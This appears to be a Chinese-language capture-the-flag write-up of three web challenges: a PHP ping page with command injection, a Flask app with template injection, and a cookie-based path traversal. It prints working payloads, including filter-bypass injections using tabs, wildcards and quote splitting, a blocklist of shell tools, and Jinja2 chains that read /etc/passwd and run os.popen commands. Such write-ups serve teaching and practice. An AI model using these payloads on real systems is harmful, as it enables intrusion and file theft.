文章目录
Command
命令执行绕过
<?php
error_reporting(0);
if (isset($_GET['url'])) {
$ip=$_GET['url'];
if(preg_match("/(;|'| |>|]|&| |\\$|python|sh|nc|tac|rev|more|tailf|index|php|head|nl|tail|less|cat|ruby|perl|bash|rm|cp|mv|\*|\{)/i", $ip)){
die("<script language='javascript' type='text/javascript'>
alert('no no no!')
window.location.href='index.php';</script>");
}else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("<script language='javascript' type='text/javascript'>
alert('no flag!')
window.location.href='index.php';</script>");
}
$a = shell_exec("ping -c 4 ".$ip);
}
?>
读根目录
?url=1%7Cls%09-lha%09/
没发现flag,读/etc时发现一个.findflag的隐藏文件夹
?url=1%7Cls%09-lha%09/etc
这里flag字样都是被过滤的
preg_match("/.*f.*l.*a.*g.*/", $ip)
使用通配符绕过,但是*被过滤了,使用?
?url=1%7Cls%09-lha%09/etc/.find????
再读flag.txt文件,这里绝大部分读取文件命令都被过滤了,可以使用类似ca""t在命令中加入双引号绕过执行
?url=1%7Cca""t%09/etc/.find????/????.txt
flaskbot
在url后面和Cookie中随便加点什么使得路由报错,这里开启了调试模式,会回显报错代码
在输入用户名之后,用户名会被放在Cookie中并进行渲染,只需要我们输入的num全部大于程序给出的值,这里就可以使用NAN和INF去比较,但是这里INF太大了,有限制,所以只能用NAN去比较
接下来对user参数进行注入,使用burp在输入数字进行比较的时候抓包,修改Cookie中的user就行,对payload编码一下就行
查看基类
{{''.__class__.__mro__[2]}}
查看所有子类
{{''.__class__.__mro__[2].__subclasses__()}}
读取/etc/passwd
{{[].__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()}}
可以读取文件了就肯定要读一下源码,在之前的报错中已经回显出了源码的绝对路径
{{[].__class__.__bases__[0].__subclasses__()[40]('/usr/local/lib/python2.7/site-packages/flask/app.py').read()}}
执行命令,测试的时候发现有过滤,拼接一下绕过即可
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['ev'+'al']('__imp'+'ort__("o'+'s").po'+'pen("id").read()')}}
读取根目录,发现flag
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['ev'+'al']('__imp'+'ort__("o'+'s").po'+'pen("ls /").read()')
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['ev'+'al']('__imp'+'ort__("o'+'s").po'+'pen("cat /super_secret_fl'+'ag.txt").read()')}}
easygogogo
这题有点迷,我也不知道这样解出来是预期解还是非预期解
登录之后有个上传和展示的操作,在上传完之后会根据上传的文件名和用户名给出一个cookie,然后展示的时候从cookie中读取文件名展示,目录路径可控并且可以路径穿越,但是上传之后每个文件都会分配一串md5,展示的时候应该会检查这串md5,所以在测试的时候无论怎样修改目录都无法跳出web根目录,然后在容器重新下发的时候,当我给这个容器使用上一个容器构造的cookie时,发现竟然就能读取到flag了。。。。。。。
首先获取读取可以flag文件Cookie
然后重新下发容器,随便上传一个文件,再抓展示的包,填上之前的Cookie